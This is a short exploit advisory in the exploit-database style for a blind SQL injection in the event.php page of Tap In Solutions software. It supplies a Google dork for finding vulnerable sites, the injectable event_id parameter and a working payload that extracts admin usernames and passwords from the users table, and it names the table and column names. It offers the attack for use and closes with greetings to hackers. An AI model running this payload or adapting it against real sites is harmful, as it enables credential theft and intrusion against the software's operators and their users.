========================================================================== # Exploit Title: Tap In Solutions Blind SQL Injection Vulnerability # Date: 17.10.2011 # Author: poach3r # Software Link: http://www.tapinsolutionsinc.com/ # Tested on: Windows XP SP3 # Google Dork: inurl:event.php?event_id= powered by Tap In Solutions ========================================================================== # Vulnerable File : ==> event.php <== # Exploit : http://127.0.0.1/path/event.php?event_id=[SQL] # Demo : http://127.0.0.1/path/event.php?event_id=1/**/and/**/(select/**/substring(concat(1,user_name,password),1,1)/**/from/**/users/**/limit/**/0,1)=1 # Details : Admin Table : users Username Column : user_name Password Column : password ========================================================================== # GreetZ To : All IRANIAN HackerZ ./End